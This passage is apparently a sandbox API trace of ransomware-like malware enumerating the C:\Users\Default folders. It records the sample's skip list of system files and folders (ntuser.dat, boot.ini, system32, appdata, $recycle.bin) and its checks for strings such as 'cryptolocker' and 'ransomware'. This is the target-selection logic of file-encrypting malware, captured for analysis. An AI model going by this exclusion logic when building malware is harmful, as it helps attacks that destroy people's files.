psz2="thumbs.db") returned -1 [0089.826] StrCmpIW (psz1="NTUSER.DAT", psz2=" ransomware ") returned 1 [0089.826] StrCmpIW (psz1="NTUSER.DAT", psz2=" ransom ") returned 1 [0089.826] StrCmpIW (psz1="NTUSER.DAT", psz2="debug.txt") returned 1 [0089.826] StrCmpIW (psz1="NTUSER.DAT", psz2="boot.ini") returned 1 [0089.826] StrCmpIW (psz1="NTUSER.DAT", psz2="desktop.ini") returned 1 [0089.826] StrCmpIW (psz1="NTUSER.DAT", psz2="autorun.inf") returned 1 [0089.826] StrCmpIW (psz1="NTUSER.DAT", psz2="ntuser.dat") returned 0 [0089.826] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c6021fd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x6c6021fd, ftLastAccessTime.dwHighDateTime=0x1d29fdc, ftLastWriteTime.dwLowDateTime=0x6c6021fd, ftLastWriteTime.dwHighDateTime=0x1d29fdc, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0089.826] StrCmpW (psz1="NTUSER.DAT.LOG1", psz2=".") returned 1 [0089.826] StrCmpW (psz1="NTUSER.DAT.LOG1", psz2="..") returned 1 [0089.826] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c6021fd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x6c6021fd, ftLastAccessTime.dwHighDateTime=0x1d29fdc, ftLastWriteTime.dwLowDateTime=0x6c6021fd, ftLastWriteTime.dwHighDateTime=0x1d29fdc, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0089.826] StrCmpW (psz1="NTUSER.DAT.LOG2", psz2=".") returned 1 [0089.826] StrCmpW (psz1="NTUSER.DAT.LOG2", psz2="..") returned 1 [0089.826] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7dab84ff, ftCreationTime.dwHighDateTime=0x1d2fa07, ftLastAccessTime.dwLowDateTime=0xacbd1187, ftLastAccessTime.dwHighDateTime=0x1d2fa0d, ftLastWriteTime.dwLowDateTime=0x855f639a, ftLastWriteTime.dwHighDateTime=0x1d2fa07, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0089.826] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", psz2=".") returned 1 [0089.826] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", psz2="..") returned 1 [0089.826] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7ddd9675, ftCreationTime.dwHighDateTime=0x1d2fa07, ftLastAccessTime.dwLowDateTime=0xacbd1187, ftLastAccessTime.dwHighDateTime=0x1d2fa0d, ftLastWriteTime.dwLowDateTime=0x855d0141, ftLastWriteTime.dwHighDateTime=0x1d2fa07, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0089.826] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", psz2=".") returned 1 [0089.826] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", psz2="..") returned 1 [0089.826] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7de71fdf, ftCreationTime.dwHighDateTime=0x1d2fa07, ftLastAccessTime.dwLowDateTime=0x855d0141, ftLastAccessTime.dwHighDateTime=0x1d2fa07, ftLastWriteTime.dwLowDateTime=0x855d0141, ftLastWriteTime.dwHighDateTime=0x1d2fa07, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0089.826] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", psz2=".") returned 1 [0089.826] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", psz2="..") returned 1 [0089.826] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8b6f06dc, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8b6f06dc, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x8b762e4b, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", cAlternateFileName="NTUSER~2.BLF")) returned 1 [0089.826] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", psz2=".") returned 1 [0089.827] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", psz2="..") returned 1 [0089.827] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8b6f06dc, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8b6f06dc, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x8b762e4b, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~3.REG")) returned 1 [0089.827] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", psz2=".") returned 1 [0089.827] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", psz2="..") returned 1 [0089.827] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8b716935, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8b716935, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x8b762e4b, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~4.REG")) returned 1 [0089.827] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", psz2=".") returned 1 [0089.827] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", psz2="..") returned 1 [0089.827] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbafc3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0089.827] StrCmpW (psz1="Pictures", psz2=".") returned 1 [0089.827] StrCmpW (psz1="Pictures", psz2="..") returned 1 [0089.827] StrCpyNW (in: psz1=0xec50e8, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0089.827] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0089.827] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Pictures", cchMax=1058 | out: psz1="C:\\Users\\Default\\Pictures") returned="C:\\Users\\Default\\Pictures" [0089.827] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\windows\\system32\\") returned 0x0 [0089.827] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.827] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\windows\\system\\") returned 0x0 [0089.827] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.827] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.827] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\appdata\\local\\") returned 0x0 [0089.827] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.827] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.827] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.827] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\boot\\") returned 0x0 [0089.827] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\perflogs\\") returned 0x0 [0089.827] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\programdata\\") returned 0x0 [0089.827] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\drivers\\") returned 0x0 [0089.827] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\wsus\\") returned 0x0 [0089.827] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\efstmpwp\\") returned 0x0 [0089.827] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\$recycle.bin\\") returned 0x0 [0089.827] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="crypt_detect") returned 0x0 [0089.827] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="cryptolocker") returned 0x0 [0089.827] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="ransomware") returned 0x0 [0089.827] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="C:\\WINDOWS") returned 0x0 [0089.828] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="C:\\Program Files (x86)") returned 0x0 [0089.828] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="C:\\Program Files") returned 0x0 [0089.828] GetProcessHeap () returned 0xe30000 [0089.828] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xec65a0 [0089.828] StrCpyNW (in: psz1=0xec65a0, psz2="C:\\Users\\Default\\Pictures", cchMax=1076 | out: psz1="C:\\Users\\Default\\Pictures") returned="C:\\Users\\Default\\Pictures" [0089.828] StrNCatW (in: psz1="C:\\Users\\Default\\Pictures", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\Default\\Pictures\\*") returned="C:\\Users\\Default\\Pictures\\*" [0089.828] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Pictures\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbafc3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2070 [0089.828] StrCmpW (psz1=".", psz2=".") returned 0 [0089.828] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbafc3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.828] StrCmpW (psz1="..", psz2=".") returned 1 [0089.828] StrCmpW (psz1="..", psz2="..") returned 0 [0089.828] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbafc3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0089.828] FindClose (in: hFindFile=0xec2070 | out: hFindFile=0xec2070) returned 1 [0089.828] GetProcessHeap () returned 0xe30000 [0089.828] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec65a0 | out: hHeap=0xe30000) returned 1 [0089.828] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0089.828] StrCmpW (psz1="PrintHood", psz2=".") returned 1 [0089.828] StrCmpW (psz1="PrintHood", psz2="..") returned 1 [0089.828] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0089.828] StrCmpW (psz1="Recent", psz2=".") returned 1 [0089.828] StrCmpW (psz1="Recent", psz2="..") returned 1 [0089.828] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbb8a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0089.828] StrCmpW (psz1="Saved Games", psz2=".") returned 1 [0089.828] StrCmpW (psz1="Saved Games", psz2="..") returned 1 [0089.828] StrCpyNW (in: psz1=0xec50e8, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0089.828] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0089.828] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Saved Games", cchMax=1058 | out: psz1="C:\\Users\\Default\\Saved Games") returned="C:\\Users\\Default\\Saved Games" [0089.828] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\windows\\system32\\") returned 0x0 [0089.828] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.829] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\windows\\system\\") returned 0x0 [0089.829] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.829] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.829] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\appdata\\local\\") returned 0x0 [0089.829] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.829] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.829] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.829] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\boot\\") returned 0x0 [0089.829] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\perflogs\\") returned 0x0 [0089.829] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\programdata\\") returned 0x0 [0089.829] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\drivers\\") returned 0x0 [0089.829] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\wsus\\") returned 0x0 [0089.829] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\efstmpwp\\") returned 0x0 [0089.829] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\$recycle.bin\\") returned 0x0 [0089.829] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="crypt_detect") returned 0x0 [0089.829] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="cryptolocker") returned 0x0 [0089.829] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="ransomware") returned 0x0 [0089.829] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="C:\\WINDOWS") returned 0x0 [0089.829] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="C:\\Program Files (x86)") returned 0x0 [0089.829] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="C:\\Program Files") returned 0x0 [0089.829] GetProcessHeap () returned 0xe30000 [0089.829] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ba) returned 0xec65a0 [0089.829] StrCpyNW (in: psz1=0xec65a0, psz2="C:\\Users\\Default\\Saved Games", cchMax=1082 | out: psz1="C:\\Users\\Default\\Saved Games") returned="C:\\Users\\Default\\Saved Games" [0089.829] StrNCatW (in: psz1="C:\\Users\\Default\\Saved Games", psz2="\\*", cchMax=1082 | out: psz1="C:\\Users\\Default\\Saved Games\\*") returned="C:\\Users\\Default\\Saved Games\\*" [0089.829] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Saved Games\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbb8a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0089.829] StrCmpW (psz1=".", psz2=".") returned 0 [0089.829] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbb8a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.829] StrCmpW (psz1="..", psz2=".") returned 1 [0089.829] StrCmpW (psz1="..", psz2="..") returned 0 [0089.830] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbb8a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0089.830] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0089.830] GetProcessHeap () returned 0xe30000 [0089.830] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec65a0 | out: hHeap=0xe30000) returned 1 [0089.830] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0089.830] StrCmpW (psz1="SendTo", psz2=".") returned 1 [0089.830] StrCmpW (psz1="SendTo", psz2="..") returned 1 [0089.830] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0089.830] StrCmpW (psz1="Start Menu", psz2=".") returned 1 [0089.830] StrCmpW (psz1="Start Menu", psz2="..") returned 1 [0089.830] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0089.830] StrCmpW (psz1="Templates", psz2=".") returned 1 [0089.830] StrCmpW (psz1="Templates", psz2="..") returned 1 [0089.830] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0089.830] StrCmpW (psz1="Videos", psz2=".") returned 1 [0089.830] StrCmpW (psz1="Videos", psz2="..") returned 1 [0089.830] StrCpyNW (in: psz1=0xec50e8, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0089.830] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0089.830] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Videos", cchMax=1058 | out: psz1="C:\\Users\\Default\\Videos") returned="C:\\Users\\Default\\Videos" [0089.830] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\windows\\system32\\") returned 0x0 [0089.830] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.830] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\windows\\system\\") returned 0x0 [0089.830] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.830] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.830] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\appdata\\local\\") returned 0x0 [0089.830] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.830] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.830] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.830] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\boot\\") returned 0x0 [0089.830] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\perflogs\\") returned 0x0 [0089.830] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\programdata\\") returned 0x0 [0089.831] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\drivers\\") returned 0x0 [0089.831] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\wsus\\") returned 0x0 [0089.831] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\efstmpwp\\") returned 0x0 [0089.831] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch=":\\$recycle.bin\\") returned 0x0 [0089.831] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="crypt_detect") returned 0x0 [0089.831] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="cryptolocker") returned 0x0 [0089.831] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="ransomware") returned 0x0 [0089.831] StrStrIW (lpFirst="C:\\Users\\Default\\Videos", lpSrch="C:\\WINDOWS") returned 0x0 [0089.831] StrStrIW 